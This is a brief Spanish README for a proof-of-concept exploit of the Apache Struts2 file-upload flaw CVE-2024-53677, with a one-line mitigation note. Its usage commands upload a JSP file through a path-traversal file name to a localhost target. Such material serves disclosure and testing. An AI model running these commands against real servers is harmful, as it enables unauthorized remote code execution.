
Exploit de prueba de concepto para CVE-2024-53677 (S2-067), una omisión de la lógica de carga de archivos en Apache Struts2 que permite la ejecución remota de código mediante parámetros de nombre de archivo manipulados.
Por lo tanto, la mitigación también es sencilla: restringir las extensiones, usar nombres de archivo aleatorios personalizados, etc.
python3 s2-067.py -h
python3 s2-067.py -u http://localhost:28080/uploadFile -filename ../poc.jsp -file 2.jsp -type s
